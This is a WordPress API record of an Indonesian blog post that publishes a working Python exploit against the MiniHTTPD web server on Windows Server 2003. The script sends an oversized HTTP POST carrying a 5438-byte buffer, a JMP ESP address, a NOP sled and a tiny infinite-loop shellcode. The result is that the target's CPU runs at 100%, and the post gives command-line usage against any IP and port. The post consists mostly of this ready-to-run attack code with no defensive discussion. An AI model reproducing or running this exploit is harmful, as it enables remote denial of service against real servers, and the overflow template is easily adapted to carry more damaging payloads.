{"id":304,"date":"2018-10-13T08:57:05","date_gmt":"2018-10-13T08:57:05","guid":{"rendered":"http:\/\/xcode.or.id\/blog\/?p=304"},"modified":"2018-10-18T05:03:02","modified_gmt":"2018-10-18T05:03:02","slug":"exploit-web-server-minihttpd-agar-cpu-bekerja-100-di-windows-server","status":"publish","type":"post","link":"https:\/\/xcode.or.id\/blog\/index.php\/2018\/10\/13\/exploit-web-server-minihttpd-agar-cpu-bekerja-100-di-windows-server\/","title":{"rendered":"Exploit Web Server MiniHTTPD agar CPU bekerja 100% di Windows Server"},"content":{"rendered":"<p>Exploit Web Server Mini HTTPD agar CPU bekerja 100% yang dibuat oleh Kurniawan untuk Windows Server<\/p>\n<pre>#!\/usr\/bin\/python\r\nimport socket\r\nimport sys\r\n \r\nif len(sys.argv) != 3:\r\n    print \"Exploit MiniHTTPD untuk membuat CPU Windows 2003 Server bekerja 100%\" \r\n    print \"Oleh Kurniawan. trainingxcode@gmail.com. xcode.or.id.\"\r\n    print \"Cara penggunaan : .\/minihttpd.py &lt;ip target&gt; &lt;port&gt;\"\r\n    sys.exit(1)\r\n \r\nipaddress = sys.argv[1]\r\nport = int(sys.argv[2])\r\nbuffer = \"A\" * 5438\r\neip = \"\\x38\\x07\\xD2\\x77\" #JMP ESP, user32.dll\r\nnop = \"\\x90\" * 36\r\n#Source code assembly shellcode buatan Mr.Ne0z, staff X-code ( xcode.or.id\/community ), https:\/\/github.com\/ne0z\r\n#BITS 32\r\n#global _start\r\n#_start:\r\n#xor eax, eax\r\n#inc eax\r\n#dec eax\r\n#jmp _start\r\nshellcode = (\"\\x31\\xc0\\x40\\x48\\xeb\\xfa\")\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((str(ipaddress),(port)))\r\n#Bug Reference : https:\/\/www.exploit-db.com\/exploits\/26739\r\nbuf = \"POST \/ %s HTTP\/1.1\\r\\nHost:(str(ipaddress)\\r\\n\\r\\n\" % (buffer+eip+nop+shellcode)\r\n \r\ns.send(buf)\r\ns.close()<\/pre>\n<p>Exploit ini bisa diakses di <a href=\"https:\/\/github.com\/kurniawandata\/exploitminihttpdforwinserver\">https:\/\/github.com\/kurniawandata\/exploitminihttpdforwinserver<\/a><\/p>\n<p>Oleh Kurniawan<\/p>\n<p>Founder X-code<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Web Server Mini HTTPD agar CPU bekerja 100% yang dibuat oleh Kurniawan untuk Windows Server #!\/usr\/bin\/python import socket import sys if len(sys.argv) != 3: print &#8220;Exploit MiniHTTPD untuk membuat CPU Windows 2003 Server bekerja 100%&#8221; print &#8220;Oleh Kurniawan. trainingxcode@gmail.com. <a href=\"https:\/\/xcode.or.id\/blog\/index.php\/2018\/10\/13\/exploit-web-server-minihttpd-agar-cpu-bekerja-100-di-windows-server\/\" class=\"read-more\">Read More &#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/304"}],"collection":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=304"}],"version-history":[{"count":3,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions"}],"predecessor-version":[{"id":375,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/posts\/304\/revisions\/375"}],"wp:attachment":[{"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/xcode.or.id\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}